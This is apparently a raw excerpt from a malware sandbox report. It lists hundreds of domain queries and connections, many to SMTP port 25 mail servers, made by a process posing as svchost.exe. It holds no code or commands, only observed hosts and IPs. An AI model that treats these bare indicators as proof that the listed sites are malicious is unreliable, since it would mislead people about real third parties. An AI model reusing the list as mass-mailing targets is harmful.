Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 185.253.212.22 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 89.221.250.3 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: gmail-smtp-in.l.google.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: fdlymca.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: assideum.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.hyabmagneter.se
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: bidroll.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: karmy.com.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: vdoherty.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 185.230.63.186 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 51.159.3.117 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ncn.de
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: komie.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ftmobile.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 79.124.76.247 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 66.111.4.72 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.67.71.13 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: onzcda.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: sledsport.ru
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: tbvlugus.nl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: pellys.co.uk
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 46.19.218.80 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: semuk.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: tozzhin.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 195.96.252.188 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: de
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: lyto.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mail.airmail.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 164.132.175.106 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: websy.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.164.117.233 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 106west.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ruzee.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: nblewis.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: amba-tc.si
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 198.185.159.144 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mxs.mail.ru
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: averwin.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 211.13.196.162 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 141.193.213.20 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: chzko.ru
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.20.54.214 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 76.223.35.103 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: themark.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ossir.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: clysma.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 185.76.64.25 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: e-kami.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.92.170 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: scintel.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 87.98.236.253 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 87.230.93.218 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: kewlmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 67.195.12.38 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: actmin.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: flamingorecordings.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: bount.com.tw
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 75.2.70.75 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 52.86.6.113 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: pers.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 136.243.147.81 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 92.42.191.38 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mackusick.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: angework.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mail7.digitalwaves.co.nz
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 202.53.77.146 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hes.pt
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: reproar.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 188.94.254.88 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 69.46.30.77 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 127.0.0.11 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 221.132.33.88 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: portoccd.org
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 162.241.233.114 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: avc.com.sa
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 165.160.13.20 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cnti.krsn.ru
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.67.71.55 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.67.145.148 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 54.194.190.151 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 202.94.166.30 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ultibax.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dspears.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 54.217.118.81 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 103.224.212.222 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 49.212.235.59 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: bggs.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: unicus.jp
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.41.152 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cyclad.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: clinicasanluis.com.co
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: peminet.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: michiana.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ludomemo.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: umcor.am
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: pccj.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 87.248.97.31 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: wvs-net.de
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.fnw.us
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 108.170.12.50 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 173.205.126.33 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: adeesa.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.synetik.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 87.248.97.36 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: strazynski.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: sjbmw.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 153.120.34.73 443
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 173.231.184.124 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 157.7.107.38 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: amerifor.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 164.90.244.158 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 18.177.67.59 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: gujarat.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ifesnet.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: vfcindia.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: aoinko.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cpwpb.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: akdeniz.nl
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 205.149.134.32 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: rtcasey.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: gydrozo.ru
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: n23china.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 107.165.223.27 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hamaker.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: sigtoa.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 133.125.38.187 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 174.129.25.170 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.koz1.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 89.161.136.188 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: refintl.org
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 68.71.135.170 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: sidepath.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 89gospel.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: listel.co.jp
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 15.197.142.173 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hyab.se
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: zemarmot.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 204.15.134.44 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 157.7.107.49 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: thiessen.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 89.107.169.125 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 185.237.66.112 443
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: samtv.ro
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 23.185.0.4 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: techtrans.de
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: calvinly.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ftchat.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 52.19.230.145 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 153.122.24.177 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: kavram.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: pcoyuncu.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: webavant.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.67.156.49 443
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 35.168.185.204 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 202.172.28.187 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 91.201.52.102 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 52.219.100.131 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: koz1.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: yasuma.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 79.96.32.254 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 4locals.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 153.122.170.15 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: johnlyon.org
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 65.52.128.33 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 69.89.107.122 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.18.40.43 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 192.124.249.14 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 192.124.249.15 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 18.176.155.206 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.26.3.14 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: from30ty.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: bigzz.by
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 43.246.117.171 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: vonparis.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 217.160.0.179 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: envogen.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: x96.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: kairel.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: nlcv.bas.bg
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 34.193.204.92 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: com-edit.fr
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 185.244.106.2 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 135.125.108.170 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: linac.co.uk
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: uster.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: noblesse.be
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 199.59.243.220 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: bossinst.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: redgiga.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: absblast.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: someikan.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hubbikes.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 199.59.243.223 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: riwn.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: t-mould.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: geecl.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: toundo.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbnet.at
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ktenergo.ru
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 91.220.211.163 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.diamir.de
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.67.148.147 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: juso-gr.ch
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.wnsavoy.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.67.196.145 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 185.129.138.60 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 91.216.241.100 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 62.75.216.107 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: midap.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: smitko.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.19.68 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 80.82.115.227 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 52.128.23.153 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: yhsll.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: anteph.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hyab.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mikihan.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ramkome.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: wahw.com.au
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 23.227.38.32 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 51.89.6.56 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 205.178.189.131 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: kayoaiba.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: gbmfg.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: orlyhotel.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.wkhk.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ccssinc.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 27.0.174.59 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 183.181.82.14 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: t-trust.jp
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 54.209.32.212 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 23.225.40.19 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: pro-fa.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 185.31.76.90 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: forbin.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cutchie.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: univi.it
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 3.64.163.50 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 35.230.155.43 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: smtp.live.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.77.146 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.26.1.82 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: grlawcc.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 3.19.116.195 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 154.213.117.166 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.pb-games.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.ex-olive.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 35.169.15.168 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.76.38 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 151.101.2.132 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: coxkitchensandbaths.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: invictus.pl
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.217.218.26 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: holp-ai.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: shittas.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 198.49.23.145 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: missnue.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: bible.org
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 142.251.31.26 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 203.137.75.45 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: jsaps.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 142.251.31.27 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 153.126.211.112 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 217.160.0.131 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: haigh-me.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 198.49.23.144 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 83.223.113.46 443
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 157.112.187.75 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: canasil.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ldh.la.gov
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cpmteam.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: awfraser.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 85.128.196.22 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: s5w.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: in1.smtp.messagingengine.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: paraski.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.sclover3.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 35.186.238.101 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: araax.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 109.71.54.22 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: adventist.ro
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 219.94.129.97 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 49.212.232.113 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 74.208.215.145 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: isom.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: any-s.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 54.36.175.146 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: piacton.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 78.46.224.133 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 77.78.104.3 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ciicsc.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: akr.co.id
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: shztm.ru
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 97.74.42.79 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 15.204.18.132 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: metaforacom.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 210.140.73.39 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dhh.la.gov
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 31.177.80.70 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cbras.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: atbauk.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ymlp15.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: vvsteknik.dk
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: biosolve.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 213.142.131.159 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 203.0.113.0 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 208.100.26.245 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hbfuels.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: atis-sk.ca
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mackusick.de
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cvswl.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: nekono.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 192.124.249.3 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: infotech.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cubodown.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: smtp.sbcglobal.yahoo.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: tabbles.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cqdgroup.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.67.164.178 443
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.muhr-soehne.de
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 63.251.106.25 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: fortknox.bm
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 212.44.102.57 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: camamat.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ikulani.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cjborden.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: alexpope.biz
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 95.174.22.233 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: fundeo.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.79.166 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: lpver.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 185.151.30.147 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 199.34.228.78 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: web-york.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 54.248.94.67 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: sanfotek.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: fr-dat.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 35.172.94.1 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 195.128.140.29 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: beafin.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: stopllc.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 159.89.244.183 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 38.111.255.201 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dzm.cz
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: oozkranj.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 204.11.56.48 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: arowines.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: rast.se
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hazmatt.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: fifa-ews.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: aba.org.eg
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 47.91.167.60 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: wanoa.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: shiner.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 219.94.128.87 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.234.120 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.8.75 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 82.208.6.9 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.reglera.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: kustnara.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: msl-lock.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: apcotex.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: scip.org.uk
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.usadig.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 35.214.171.193 443
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 192.169.149.78 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 183.90.232.24 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: epc.com.au
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 75.2.95.235 443
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: okashimo.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: slower.it
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 34.224.10.110 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 85.128.55.51 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: workplus.hu
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: awal.ws
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: c-drop.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: jnf.at
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.67.163.173 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: top1oil.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mjrcpas.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cjcagent.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: at-shun.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: kumaden.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: daytonir.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: iranytu.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 185.42.105.162 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: banvari.com
